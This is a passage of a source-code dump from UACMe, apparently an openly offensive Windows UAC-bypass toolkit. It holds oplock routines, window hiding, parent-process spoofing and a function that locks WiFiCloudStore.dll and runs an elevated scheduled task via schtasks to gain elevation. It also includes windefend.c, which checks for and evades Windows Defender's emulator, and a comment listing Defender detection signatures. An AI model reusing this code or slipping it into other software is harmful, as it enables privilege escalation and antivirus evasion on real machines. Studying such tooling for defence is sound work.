bResult;\n}\n\nBOOL ucmReleaseOpLock(\n _In_ POPLOCK_FILE_CONTEXT ofc\n)\n{\n if (ofc == NULL) {\n return FALSE;\n }\n\n if (ofc->Length < sizeof(OPLOCK_FILE_CONTEXT)) {\n return FALSE;\n }\n\n CloseHandle(ofc->Overlapped.hEvent);\n CloseHandle(ofc->FileHandle);\n\n return TRUE;\n}\n\nBOOL ucmOpLockFile(\n _In_ LPCWSTR FileName,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ DWORD ShareMode,\n _In_ BOOL Exclusive,\n _In_ POPLOCK_FILE_CONTEXT ofc\n)\n{\n DWORD bret = 0;\n REQUEST_OPLOCK_INPUT_BUFFER roib;\n REQUEST_OPLOCK_OUTPUT_BUFFER roob;\n DWORD flags = 0;\n\n if (FileName == NULL || ofc == NULL) {\n return FALSE;\n }\n if (ofc->Length < sizeof(OPLOCK_FILE_CONTEXT)) {\n return FALSE;\n }\n\n RtlSecureZeroMemory(&ofc->Overlapped, sizeof(OVERLAPPED));\n RtlSecureZeroMemory(&roib, sizeof(roib));\n RtlSecureZeroMemory(&roob, sizeof(roob));\n\n roib.StructureLength = sizeof(roib);\n roib.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;\n roib.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_HANDLE;\n roib.Flags = REQUEST_OPLOCK_INPUT_FLAG_REQUEST;\n roob.StructureLength = sizeof(roob);\n roob.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;\n ofc->Overlapped.hEvent = CreateEvent(NULL, TRUE, FALSE, NULL);\n\n if (ofc->Overlapped.hEvent == NULL) {\n return FALSE;\n }\n\n flags = FILE_FLAG_OVERLAPPED;\n if (GetFileAttributes(FileName) & FILE_ATTRIBUTE_DIRECTORY) {\n flags |= FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT;\n }\n\n if (DesiredAccess == 0) {\n DesiredAccess = GENERIC_READ;\n }\n\n ofc->FileHandle = CreateFile(FileName, DesiredAccess, ShareMode, NULL, OPEN_EXISTING, flags, NULL);\n if (ofc->FileHandle == INVALID_HANDLE_VALUE) {\n return FALSE;\n }\n\n if (Exclusive) {\n bret = 0;\n DeviceIoControl(ofc->FileHandle, FSCTL_REQUEST_OPLOCK_LEVEL_1, NULL, 0, NULL, 0, &bret, &ofc->Overlapped);\n }\n else {\n DeviceIoControl(ofc->FileHandle, FSCTL_REQUEST_OPLOCK, &roib, sizeof(roib), &roob, sizeof(roob), NULL, &ofc->Overlapped);\n }\n\n if (GetLastError() != ERROR_IO_PENDING) {\n return FALSE;\n }\n\n return TRUE;\n}\n\n//\n// OpLocks from R41N3RZUF477 end.\n//\n\n/*\n* ucmxHideMainWindowCallback\n*\n* Purpose:\n*\n* EnumWindows callback to hide windows belonging to current process.\n*\n*/\nBOOL ucmxHideMainWindowCallback(\n _In_ HWND hwnd,\n _In_ LPARAM lParam\n)\n{\n DWORD pid = 0;\n\n UNREFERENCED_PARAMETER(lParam);\n\n GetWindowThreadProcessId(hwnd, &pid);\n if (pid == 0)\n return TRUE;\n\n if (GetCurrentProcessId() != pid)\n return TRUE;\n\n if (GetWindow(hwnd, GW_OWNER))\n return TRUE;\n\n if (!IsWindowVisible(hwnd))\n return TRUE;\n\n ShowWindow(hwnd, SW_HIDE);\n return TRUE;\n}\n\n/*\n* ucmHideMainWindow\n*\n* Purpose:\n*\n* Hide current process windows.\n*\n*/\nVOID ucmHideMainWindow(\n VOID\n)\n{\n EnumWindows((WNDENUMPROC)ucmxHideMainWindowCallback, 0);\n}\n\n/*\n* ucmCheckUIAccessPermissions\n*\n* Purpose:\n*\n* Check if current process token has UIAccess flag and high integrity level.\n*\n*/\nBOOL ucmCheckUIAccessPermissions(\n VOID)\n{\n BOOL bResult = FALSE;\n HANDLE hToken = NULL;\n BYTE tmlbuf[sizeof(TOKEN_MANDATORY_LABEL) + sizeof(SID)];\n TOKEN_MANDATORY_LABEL* tml = (TOKEN_MANDATORY_LABEL*)&tmlbuf[0];\n DWORD UIAccessFlag = 0;\n DWORD* pdwIntegrityLevel = NULL;\n DWORD retLen = 0;\n\n do {\n\n if (!NT_SUCCESS(NtOpenProcessToken(\n NtCurrentProcess(),\n MAXIMUM_ALLOWED,\n &hToken)))\n {\n break;\n }\n\n retLen = sizeof(UIAccessFlag);\n if (!GetTokenInformation(hToken, TokenUIAccess, &UIAccessFlag, sizeof(UIAccessFlag), &retLen))\n break;\n\n if (UIAccessFlag == 0)\n break;\n\n retLen = sizeof(tmlbuf);\n if (!GetTokenInformation(hToken, TokenIntegrityLevel, tml, retLen, &retLen))\n break;\n\n pdwIntegrityLevel = GetSidSubAuthority(tml->Label.Sid, 0);\n if (*pdwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID)\n break;\n\n bResult = TRUE;\n\n } while (FALSE);\n\n if (hToken) NtClose(hToken);\n return bResult;\n}\n\ntypedef HANDLE(WINAPI* pfnGetProcessHandleFromHwnd)(HWND hwnd);\n\n/*\n* ucmCallGetProcessHandleFromHwnd\n*\n* Purpose:\n*\n* Wrapper for oleacc!GetProcessHandleFromHwnd.\n*\n*/\nHANDLE ucmCallGetProcessHandleFromHwnd(\n _In_ HWND hwnd\n)\n{\n HANDLE process = NULL;\n HMODULE oleacc = NULL;\n pfnGetProcessHandleFromHwnd pGetProcessHandleFromHwnd = NULL;\n\n oleacc = LoadLibrary(L\"oleacc.dll\");\n if (oleacc) {\n pGetProcessHandleFromHwnd = (pfnGetProcessHandleFromHwnd)GetProcAddress(oleacc, \"GetProcessHandleFromHwnd\");\n if (pGetProcessHandleFromHwnd) {\n process = pGetProcessHandleFromHwnd(hwnd);\n }\n FreeLibrary(oleacc);\n }\n return process;\n}\n\n/*\n* ucmCreateProcessWithParent\n*\n* Purpose:\n*\n* CreateProcess with parent process set.\n*\n*/\nBOOL ucmCreateProcessWithParent(\n _In_ LPWSTR lpCommandLine,\n _In_ HANDLE hParent,\n _In_ DWORD dwFlags,\n _In_ WORD wShow,\n _In_ PROCESS_INFORMATION* pi\n)\n{\n SIZE_T ptsize = 0;\n STARTUPINFOEX si;\n LPPROC_THREAD_ATTRIBUTE_LIST ptal = NULL;\n BOOL bResult = FALSE;\n\n if (pi) {\n InitializeProcThreadAttributeList(NULL, 1, 0, &ptsize);\n ptal = (LPPROC_THREAD_ATTRIBUTE_LIST)ucmxHeapAlloc(ptsize);\n if (ptal) {\n\n RtlSecureZeroMemory(&si, sizeof(si));\n si.StartupInfo.cb = sizeof(si);\n si.StartupInfo.dwFlags = STARTF_FORCEOFFFEEDBACK | STARTF_USESHOWWINDOW;\n si.StartupInfo.wShowWindow = wShow;\n if (InitializeProcThreadAttributeList(ptal, 1, 0, &ptsize)) {\n if (UpdateProcThreadAttribute(ptal, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hParent, sizeof(HANDLE), NULL, NULL))\n {\n si.lpAttributeList = ptal;\n bResult = CreateProcess(NULL, lpCommandLine, NULL, NULL, FALSE,\n EXTENDED_STARTUPINFO_PRESENT | dwFlags, NULL, NULL, (STARTUPINFO*)&si, pi);\n }\n DeleteProcThreadAttributeList(ptal);\n\n }\n\n ucmxHeapFree(ptal);\n }\n }\n return bResult;\n}\n\n/*\n* ucmGetHwndFullProcessHandle\n*\n* Purpose:\n*\n* Duplicate process handle from hwnd.\n*\n*/\nHANDLE ucmGetHwndFullProcessHandle(\n _In_ HWND hwnd\n)\n{\n HANDLE hProcess = NULL;\n HANDLE hDuplicate = NULL;\n\n hProcess = ucmCallGetProcessHandleFromHwnd(hwnd);\n if (hProcess) {\n DuplicateHandle(hProcess, (HANDLE)-1, (HANDLE)-1, &hDuplicate, 0, FALSE, DUPLICATE_SAME_ACCESS);\n CloseHandle(hProcess);\n }\n\n return hDuplicate;\n}\n\n/*\n* ucmxEnumElevatedWindows\n*\n* Purpose:\n*\n* EnumWindows callback to find first window belonging to elevated process.\n*\n*/\nBOOL ucmxEnumElevatedWindows(\n _In_ HWND hwnd, \n _In_ LPARAM lParam)\n{\n DWORD dwPid = 0;\n HANDLE hProcess = NULL;\n HANDLE hToken = NULL;\n DWORD tkElvType = 0;\n DWORD retLen = 0;\n\n GetWindowThreadProcessId(hwnd, &dwPid);\n if (dwPid == 0) {\n // Continue to next window.\n return TRUE;\n }\n\n hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, dwPid);\n if (hProcess == NULL) {\n // Continue to next window.\n return TRUE;\n }\n\n if (!OpenProcessToken(hProcess, MAXIMUM_ALLOWED, &hToken)) {\n // Continue to next window.\n CloseHandle(hProcess);\n return TRUE;\n }\n\n CloseHandle(hProcess);\n\n retLen = 0;\n if (!GetTokenInformation(hToken, TokenElevationType, &tkElvType, sizeof(tkElvType), &retLen)) {\n // Continue to next window.\n CloseHandle(hToken);\n return TRUE;\n }\n\n CloseHandle(hToken);\n\n if (tkElvType == TokenElevationTypeFull) {\n //\n // Stop enumeration and return hwnd.\n //\n *(HWND*)lParam = hwnd;\n return FALSE;\n }\n\n return TRUE;\n}\n\n/*\n* ucmFindFirstElevatedWindow\n*\n* Purpose:\n*\n* Find first elevated window.\n*\n*/\nHWND ucmFindFirstElevatedWindow(\n VOID\n)\n{\n HWND hwnd = NULL;\n EnumWindows((WNDENUMPROC)ucmxEnumElevatedWindows, (LPARAM)&hwnd);\n return hwnd;\n}\n\n/*\n* ucmStartBackupLockedElevatedProcess\n*\n* Purpose:\n*\n* Create oplock on system file and run elevated task through schtasks.exe.\n*\n*/\nBOOL ucmStartBackupLockedElevatedProcess(\n _In_ POPLOCK_FILE_CONTEXT ofc\n)\n{\n BOOL bResult = FALSE;\n WCHAR szTaskCmdLine[MAX_PATH * 4];\n WCHAR szOplockPath[MAX_PATH * 2];\n PROCESS_INFORMATION pi;\n STARTUPINFO si;\n DWORD dwExitCode = 1;\n\n if (ofc == NULL || ofc->Length < sizeof(OPLOCK_FILE_CONTEXT)) {\n return FALSE;\n }\n\n RtlSecureZeroMemory(szOplockPath, sizeof(szOplockPath));\n ucmxQuerySystemDirectory(szOplockPath, FALSE);\n _strcpy(szTaskCmdLine, szOplockPath);\n _strcat(szOplockPath, L\"WiFiCloudStore.dll\");\n _strcat(szTaskCmdLine, L\"\\\\schtasks.exe /RUN /TN \\\"\\\\Microsoft\\\\Windows\\\\WlanSvc\\\\CDSSync\\\" /I\");\n\n if (!ucmOpLockFile(szOplockPath, \n GENERIC_READ, \n FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, \n TRUE, \n ofc)) \n {\n return FALSE;\n }\n \n RtlSecureZeroMemory(&pi, sizeof(pi));\n RtlSecureZeroMemory(&si, sizeof(si));\n\n si.cb = sizeof(si);\n si.dwFlags = STARTF_FORCEOFFFEEDBACK | STARTF_USESHOWWINDOW;\n si.wShowWindow = SW_HIDE;\n\n if (!CreateProcess(NULL, szTaskCmdLine, NULL, NULL, FALSE, \n CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) \n {\n ucmReleaseOpLock(ofc);\n return FALSE;\n }\n\n CloseHandle(pi.hThread);\n if (WaitForSingleObject(pi.hProcess, 3000) == WAIT_OBJECT_0) {\n if (GetExitCodeProcess(pi.hProcess, &dwExitCode)) {\n bResult = (dwExitCode == 0);\n }\n }\n\n CloseHandle(pi.hProcess);\n\n if (!bResult) {\n ucmReleaseOpLock(ofc);\n }\n\n return bResult;\n}\n"
},
{
"path": "Source/Shared/util.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2017 - 2025\n*\n* TITLE: UTIL.H\n*\n* VERSION: 3.68\n*\n* DATE: 07 Mar 2025\n*\n* Global support routines header file shared between payload dlls.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\ntypedef struct _UACME_PARAM_BLOCK {\n ULONG Crc32;\n ULONG SessionId;\n ULONG AkagiFlag;\n WCHAR szParameter[MAX_PATH + 1];\n WCHAR szDesktop[MAX_PATH + 1];\n WCHAR szWinstation[MAX_PATH + 1];\n WCHAR szSignalObject[MAX_PATH + 1];\n} UACME_PARAM_BLOCK, * PUACME_PARAM_BLOCK;\n\ntypedef BOOL(WINAPI* PFNCREATEPROCESSW)(\n LPCWSTR lpApplicationName,\n LPWSTR lpCommandLine,\n LPSECURITY_ATTRIBUTES lpProcessAttributes,\n LPSECURITY_ATTRIBUTES lpThreadAttributes,\n BOOL bInheritHandles,\n DWORD dwCreationFlags,\n LPVOID lpEnvironment,\n LPCWSTR lpCurrentDirectory,\n LPSTARTUPINFOW lpStartupInfo,\n LPPROCESS_INFORMATION lpProcessInformation);\n\ntypedef BOOL(WINAPI* PFNCREATEPROCESSASUSERW)(\n _In_opt_ HANDLE hToken,\n _In_opt_ LPCWSTR lpApplicationName,\n _Inout_opt_ LPWSTR lpCommandLine,\n _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes,\n _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,\n _In_ BOOL bInheritHandles,\n _In_ DWORD dwCreationFlags,\n _In_opt_ LPVOID lpEnvironment,\n _In_opt_ LPCWSTR lpCurrentDirectory,\n _In_ LPSTARTUPINFOW lpStartupInfo,\n _Out_ LPPROCESS_INFORMATION lpProcessInformation);\n\ntypedef struct _OBJSCANPARAM {\n PWSTR Buffer;\n SIZE_T BufferSize;\n} OBJSCANPARAM, * POBJSCANPARAM;\n\ntypedef struct _OPLOCK_FILE_CONTEXT {\n DWORD Length;\n HANDLE FileHandle;\n OVERLAPPED Overlapped;\n} OPLOCK_FILE_CONTEXT, * POPLOCK_FILE_CONTEXT;\n\nVOID ucmBinTextEncode(\n _In_ unsigned __int64 x,\n _Inout_ wchar_t* s);\n\nVOID ucmGenerateSharedObjectName(\n _In_ WORD ObjectId,\n _Inout_ LPWSTR lpBuffer);\n\nBOOLEAN ucmPrivilegeEnabled(\n _In_ HANDLE hToken,\n _In_ ULONG Privilege);\n\nNTSTATUS ucmCreateSyncMutant(\n _Out_ PHANDLE phMutant);\n\nBOOLEAN ucmIsProcess32bit(\n _In_ HANDLE hProcess);\n\nDWORD ucmGetHashForString(\n _In_ char* s);\n\nLPVOID ucmGetProcedureAddressByHash(\n _In_ PVOID ImageBase,\n _In_ DWORD ProcedureHash);\n\nVOID ucmGetStartupInfo(\n _In_ LPSTARTUPINFOW lpStartupInfo);\n\nDWORD ucmExpandEnvironmentStrings(\n _In_ LPCWSTR lpSrc,\n _Out_writes_to_opt_(nSize, return) LPWSTR lpDst,\n _In_ DWORD nSize);\n\nPVOID ucmGetSystemInfo(\n _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass);\n\nBOOL ucmLaunchPayload(\n _In_opt_ LPWSTR pszPayload,\n _In_opt_ DWORD cbPayload);\n\nBOOL ucmLaunchPayloadEx(\n _In_ PFNCREATEPROCESSW pCreateProcess,\n _In_opt_ LPWSTR pszPayload,\n _In_opt_ DWORD cbPayload);\n\nBOOL ucmLaunchPayload2(\n _In_ PFNCREATEPROCESSASUSERW pCreateProcessAsUser,\n _In_ BOOL bIsLocalSystem,\n _In_ ULONG SessionId,\n _In_opt_ LPWSTR pszPayload,\n _In_opt_ DWORD cbPayload);\n\nBOOL ucmLaunchPayload3(\n _In_opt_ LPWSTR pszPayload,\n _In_opt_ DWORD cbPayload);\n\nLPWSTR ucmQueryRuntimeInfo(\n _In_ BOOL ReturnData);\n\nBOOLEAN ucmDestroyRuntimeInfo(\n _In_ LPWSTR RuntimeInfo);\n\nBOOL ucmIsUserWinstaInteractive(\n VOID);\n\nNTSTATUS ucmIsUserHasInteractiveSid(\n _In_ HANDLE hToken,\n _Out_ PBOOL pbInteractiveSid);\n\nNTSTATUS ucmIsLocalSystem(\n _Out_ PBOOL pbResult);\n\nHANDLE ucmOpenAkagiNamespace(\n VOID);\n\n_Success_(return == TRUE)\nBOOL ucmReadSharedParameters(\n _Out_ UACME_PARAM_BLOCK * SharedParameters);\n\nVOID ucmSetCompletion(\n _In_ LPWSTR lpEvent);\n\nBOOL ucmGetProcessElevationType(\n _In_opt_ HANDLE ProcessHandle,\n _Out_ TOKEN_ELEVATION_TYPE * lpType);\n\nNTSTATUS ucmIsProcessElevated(\n _In_ ULONG ProcessId,\n _Out_ PBOOL Elevated);\n\nPLARGE_INTEGER ucmFormatTimeOut(\n _Out_ PLARGE_INTEGER TimeOut,\n _In_ DWORD Milliseconds);\n\nVOID ucmSleep(\n _In_ DWORD Miliseconds);\n\nBOOL ucmSetEnvironmentVariable(\n _In_ LPCWSTR lpName,\n _In_ LPCWSTR lpValue);\n\nBOOL ucmOpLockFile(\n _In_ LPCWSTR FileName,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ DWORD ShareMode,\n _In_ BOOL Exclusive,\n _In_ POPLOCK_FILE_CONTEXT ofc);\n\nBOOL ucmReleaseOpLock(\n _In_ POPLOCK_FILE_CONTEXT ofc);\n\nBOOL ucmWaitForOpLock(\n _In_ POPLOCK_FILE_CONTEXT ofc,\n _In_ DWORD timeout);\n\nVOID ucmHideMainWindow(\n VOID);\n\nBOOL ucmCheckUIAccessPermissions(\n VOID);\n\nHANDLE ucmCallGetProcessHandleFromHwnd(\n _In_ HWND hwnd);\n\nBOOL ucmCreateProcessWithParent(\n _In_ LPWSTR lpCommandLine,\n _In_ HANDLE hParent,\n _In_ DWORD dwFlags,\n _In_ WORD wShow,\n _In_ PROCESS_INFORMATION * pi);\n\nHANDLE ucmGetHwndFullProcessHandle(\n _In_ HWND hwnd);\n\nHWND ucmFindFirstElevatedWindow(\n VOID);\n\nBOOL ucmStartBackupLockedElevatedProcess(\n _In_ POPLOCK_FILE_CONTEXT ofc);\n\n#ifdef _DEBUG\n#define ucmDbgMsg(Message) OutputDebugString(Message)\n#else\n#define ucmDbgMsg(Message) \n#endif\n"
},
{
"path": "Source/Shared/windefend.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2015 - 2026\n*\n* TITLE: WINDEFEND.C\n*\n* VERSION: 3.69\n*\n* DATE: 12 Feb 2026\n*\n* MSE / Windows Defender anti-emulation part.\n*\n* WARNING: Kernel32/ntdll only dependencies.\n*\n* Short FAQ:\n*\n* Q: Why this module included in UACMe,\n* I thought this is demonstrator tool not real malware?\n*\n* A: WinDefender is a default AV software installed on every Windows\n* since Windows 8. Because some of the lazy malware authors copy-pasted\n* whole UACMe project in their crappiest malware WinDefender has\n* several signatures to detect UACMe and it components.\n* Example of WinDefend signature: Bampeass. We cannot be prevented by this\n* as this demonstrator must be running on newest Windows OS versions.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"shared.h\"\n\n#pragma warning(push)\n#pragma warning(disable: 4055)\n#pragma warning(disable: 4152)\n\n/*\n\nWD Signatures\n\nTrojan:Win64/Bampeass.A\n\nTriggers:\n[ U C M ] W u s a f a i l e d c o p y H i b i k i\n% t e m p % \\ H i b i k i . d l l\nE l e v a t i o n : A d m i n i s t r a t o r ! n e w : { 4 D 1 1 1 E 0 8 - C B F 7 - 4 f 1 2 - A 9 2 6 - 2 C 7 9 2 0 A F 5 2 F C }\nU A C M e i n j e c t e d , F u b u k i a t y o u r s e r v i c e\n\n\nTrojan:Win64/Bampeass.B\n\nTriggers:\nUACMe injected, Hibiki at your service.\nucmLoadCallback, dll load %ws, DllBase = %\n\n\nTrojan:Win64/Bampeass.C\n\nTriggers:\nucmLoadCallback, dll load %ws, DllBase = %p\nUACMe injected, Hibiki at your service.\nucmLoadCallback, kernel32 base found\n\n\nHackTool:Win64/UACMe.A!MSR\n\nTriggers:\n\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\WindowsNT\\CurrentVersion\\UAC\\COMAutoApprovalList\nrun /tn \"\\Microsoft\\Windows\\DiskCleanup\\SilentCleanup\" /i\n\"UACMe main module\nUAC is now disabled.\\nYou must reboot your computer for the changes to take effect.\n_FubukiProc4\nUACMe v3.1.9.1905\n\\Software\\KureND\nArisuTsuberuku\nAkagiCompletionEvent\nAkagiSharedSection\n\nHackTool:Win32/Fubuki!MTB\n\nTriggers:\nAkagiSharedSection\nsystem32\\\n_FubukiProc2\nmmc.exe\n\\?\\globalroot\\systemroot\\system32\\sysprep\\unbcl\nCorBindToRuntimeEx\nCreateUri\n\n*/\n\nDWORD wdxEmulatorAPIHashTable[] = {\n 0x70CE7692,\n 0xD4CE4554,\n 0x7A99CFAE\n};\n\nPVOID wdxGetProcedureAddressByHash(\n _In_ PVOID ImageBase,\n _In_ DWORD ProcedureHash);\n\n\n/*\n* wdxGetHashForString\n*\n* Purpose:\n*\n* Calculates specific hash for string.\n*\n*/\nDWORD wdxGetHashForString(\n _In_ char *s\n)\n{\n DWORD h = 0;\n\n while (*s != 0) {\n h ^= *s;\n h = RotateLeft32(h, 3) + 1;\n s++;\n }\n\n return h;\n}\n\n/*\n* wdxGetProcedureAddressByHash\n*\n* Purpose:\n*\n* Return pointer to function in MpClient from name hash value.\n*\n*/\nPVOID wdxGetProcedureAddressByHash(\n _In_ PVOID ImageBase,\n _In_ DWORD ProcedureHash\n)\n{\n DWORD i;\n ULONG sz = 0;\n\n IMAGE_DOS_HEADER *DosHeader;\n IMAGE_EXPORT_DIRECTORY *Exports;\n PDWORD Names, Functions;\n PWORD Ordinals;\n\n DWORD_PTR FunctionPtr;\n\n if (ImageBase == NULL)\n return NULL;\n\n DosHeader = (IMAGE_DOS_HEADER*)ImageBase;\n if (DosHeader->e_magic != IMAGE_DOS_SIGNATURE)\n return NULL;\n\n Exports = (IMAGE_EXPORT_DIRECTORY*)RtlImageDirectoryEntryToData(ImageBase, \n TRUE,\n IMAGE_DIRECTORY_ENTRY_EXPORT, \n &sz);\n\n if (Exports == NULL)\n return NULL;\n\n Names = (PDWORD)((PBYTE)DosHeader + Exports->AddressOfNames);\n Ordinals = (PWORD)((PBYTE)DosHeader + Exports->AddressOfNameOrdinals);\n Functions = (PDWORD)((PBYTE)DosHeader + Exports->AddressOfFunctions);\n\n for (i = 0; i < Exports->NumberOfNames; i++) {\n if (wdxGetHashForString((char *)((PBYTE)DosHeader + Names[i])) == ProcedureHash) {\n FunctionPtr = Functions[Ordinals[i]];\n return (PBYTE)ImageBase + FunctionPtr;\n }\n }\n\n return NULL;\n}\n/*\n* wdCheckEmulatedVFS\n*\n* Purpose:\n*\n* Detect Microsoft Security Engine emulation by it own VFS artefact.\n*\n* Microsoft AV provides special emulated environment for scanned application where it\n* fakes general system information, process environment structures/data to make sure\n* API calls are transparent for scanned code. It also use simple Virtual File System\n* allowing this AV track file system changes and if needed continue emulation on new target.\n*\n* This method implemented in commercial malware presumable since 2013.\n*\n*/\nVOID wdCheckEmulatedVFS(\n VOID\n)\n{\n WCHAR szBuffer[MAX_PATH];\n WCHAR szMsEngVFS[12] = { L':', L'\\\\', L'm', L'y', L'a', L'p', L'p', L'.', L'e', L'x', L'e', 0 };\n\n RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));\n if (GetModuleFileName(NULL, szBuffer, MAX_PATH)) {\n if (_strstri(szBuffer, szMsEngVFS) != NULL) {\n RtlExitUserProcess((UINT)0);\n }\n }\n}\n\n/*\n* wdIsEmulatorPresent\n*\n* Purpose:\n*\n* Detect MS emulator state.\n*\n*/\nNTSTATUS wdIsEmulatorPresent(\n VOID)\n{\n PCHAR ImageBase = NULL;\n\n IMAGE_DOS_HEADER *DosHeader;\n IMAGE_EXPORT_DIRECTORY *Exports;\n PDWORD Names;\n\n ULONG i, c, Hash, sz = 0;\n\n UNICODE_STRING usNtdll = RTL_CONSTANT_STRING(L\"ntdll.dll\");\n\n if (!NT_SUCCESS(LdrGetDllHandleEx(LDR_GET_DLL_HANDLE_EX_UNCHANGED_REFCOUNT,\n NULL, NULL, &usNtdll, &ImageBase)))\n {\n return STATUS_DLL_NOT_FOUND;\n }\n\n if (ImageBase == NULL)\n return STATUS_DLL_NOT_FOUND;\n\n Exports = (IMAGE_EXPORT_DIRECTORY*)RtlImageDirectoryEntryToData(ImageBase, TRUE,\n IMAGE_DIRECTORY_ENTRY_EXPORT, &sz);\n\n if (Exports == NULL)\n return STATUS_INVALID_IMAGE_FORMAT;\n\n DosHeader = (IMAGE_DOS_HEADER*)ImageBase;\n Names = (PDWORD)((PBYTE)DosHeader + Exports->AddressOfNames);\n\n for (i = 0; i < Exports->NumberOfNames; i++) {\n Hash = wdxGetHashForString((char *)((PBYTE)DosHeader + Names[i]));\n for (c = 0; c < RTL_NUMBER_OF(wdxEmulatorAPIHashTable); c++) {\n if (Hash == wdxEmulatorAPIHashTable[c])\n return STATUS_NEEDS_REMEDIATION;\n }\n }\n\n return STATUS_NOT_SUPPORTED;\n}\n\n/*\n* wdIsEmulatorPresent2\n*\n* Purpose:\n*\n* Detect MS emulator state 2.\n*\n* Microsoft AV defines virtual environment dlls loaded in runtime from VDM files.\n* These fake libraries implement additional detection layer and come with a lot of\n* predefined values.\n*\n*/\nBOOLEAN wdIsEmulatorPresent2(\n VOID)\n{ \n return NtIsProcessInJob(NtCurrentProcess(), UlongToHandle(10)) == 0x125;\n}\n\n/*\n* wdIsEmulatorPresent3\n*\n* Purpose:\n*\n* Same as previous.\n*\n*/\nBOOLEAN wdIsEmulatorPresent3(\n VOID)\n{\n if (NT_SUCCESS(NtCompressKey(UlongToHandle(0xFFFF1234))))\n return TRUE;\n\n return FALSE;\n}\n\n#pragma warning(pop)\n"
},
{
"path": "Source/Shared/windefend.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2015 - 2020\n*\n* TITLE: WINDEFEND.H\n*\n* VERSION: 3.50\n*\n* DATE: 05 Oct 2020\n*\n* MSE / Windows Defender anti-emulation part header file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\nVOID wdCheckEmulatedVFS(\n VOID);\n\nNTSTATUS wdIsEmulatorPresent(\n VOID);\n\nBOOLEAN wdIsEmulatorPresent2(\n VOID);\n\nBOOLEAN wdIsEmulatorPresent3(\n VOID);\n\n"
},
{
"path": "Source/Yuubari/Yuubari.vcxproj",
"content": "\n\n \n \n Debug\n x64\n \n \n ReleaseInternal\n x64\n \n \n Release\n x64\n \n \n \n {304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}\n Win32Proj\n Yuubari\n 10.0\n \n \n \n Application\n true\n v145\n Unicode\n false\n \n \n Application\n false\n v145\n true\n Unicode\n false\n \n \n Application\n false\n v145\n true\n Unicode\n false\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n true\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n AllRules.ruleset\n \n \n false\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n UacInfo64\n AllRules.ruleset\n false\n \n \n false\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n UacInfo64\n SecurityRules.ruleset\n true\n \n \n \n \n \n Level4\n Disabled\n _DEBUG;_WINDOWS;%(PreprocessorDefinitions)\n true\n CompileAsC\n $(ProjectDir);$(SolutionDir)\n \n \n Console\n true\n main\n 6.0\n \n \n \n \n Level4\n \n \n MaxSpeed\n true\n true\n NDEBUG;_WINDOWS;%(PreprocessorDefinitions)\n true\n CompileAsC\n MultiThreaded\n Guard\n true\n $(ProjectDir);$(SolutionDir)\n false\n true\n \n \n Console\n true\n true\n false\n main\n true\n 6.0\n /NOCOFFGRPINFO %(AdditionalOptions)\n \n \n \n \n \n \n \n \n Level4\n \n \n MinSpace\n true\n true\n NDEBUG;_WINDOWS;%(PreprocessorDefinitions)\n true\n CompileAsC\n MultiThreaded\n Guard\n true\n $(ProjectDir);$(SolutionDir)\n true\n true\n Size\n \n \n Console\n true\n true\n false\n main\n true\n 6.0\n /NOCOFFGRPINFO %(AdditionalOptions)\n \n \n \\Utils\\StripDebug.exe .\\output\\$(Platform)\\$(Configuration)\\UacInfo64.exe\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n"
},
{
"path": "Source/Yuubari/Yuubari.vcxproj.filters",
